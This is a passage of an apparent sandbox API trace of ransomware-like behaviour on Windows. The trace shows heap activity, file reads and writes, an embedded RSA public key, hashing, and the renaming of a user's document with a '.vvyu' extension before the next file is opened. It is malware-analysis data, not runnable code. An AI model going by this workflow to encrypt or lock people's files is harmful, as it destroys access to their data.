hHeap=0x6a0000) returned 1 [0186.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0186.643] GetCurrentThreadId () returned 0x264 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d375b8 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.645] GetCurrentThreadId () returned 0x264 [0186.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6dc8f8 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0186.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396b8 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0186.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0186.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38910 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.656] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x1571f, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x1571f, lpOverlapped=0x0) returned 1 [0186.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.657] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15724, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.657] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.658] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.659] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.659] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.659] CloseHandle (hObject=0x584) returned 1 [0186.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0186.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0186.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0186.661] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\ZSmCHocWuLlaLZ-0Fsrc.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\zsmchocwullalz-0fsrc.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\ZSmCHocWuLlaLZ-0Fsrc.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\zsmchocwullalz-0fsrc.ots.vvyu")) returned 1 [0186.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.664] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0186.667] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f3f3e0, ftCreationTime.dwHighDateTime=0x1d8a67e, ftLastAccessTime.dwLowDateTime=0x8a5bc880, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x8a5bc880, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x40f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzDsCcZ.xlsx", cAlternateFileName="ZZDSCC~1.XLS")) returned 1 [0186.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38910 [0186.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38910 | out: hHeap=0x6a0000) returned 1 [0186.667] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\zzDsCcZ.xlsx") returned=".xlsx" [0186.667] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\zzDsCcZ.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\zzdsccz.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.669] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=1039) returned 1 [0186.669] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.672] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.672] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.675] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.675] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x40f, lpOverlapped=0x0) returned 1 [0186.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.675] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.675] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.676] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.676] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.677] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.677] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.677] GetLastError () returned 0x0 [0186.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.677] GetLastError () returned 0x0 [0186.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.677] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.677] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.678] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.678] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.678] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x2d42908 [0186.679] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38910 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.679] 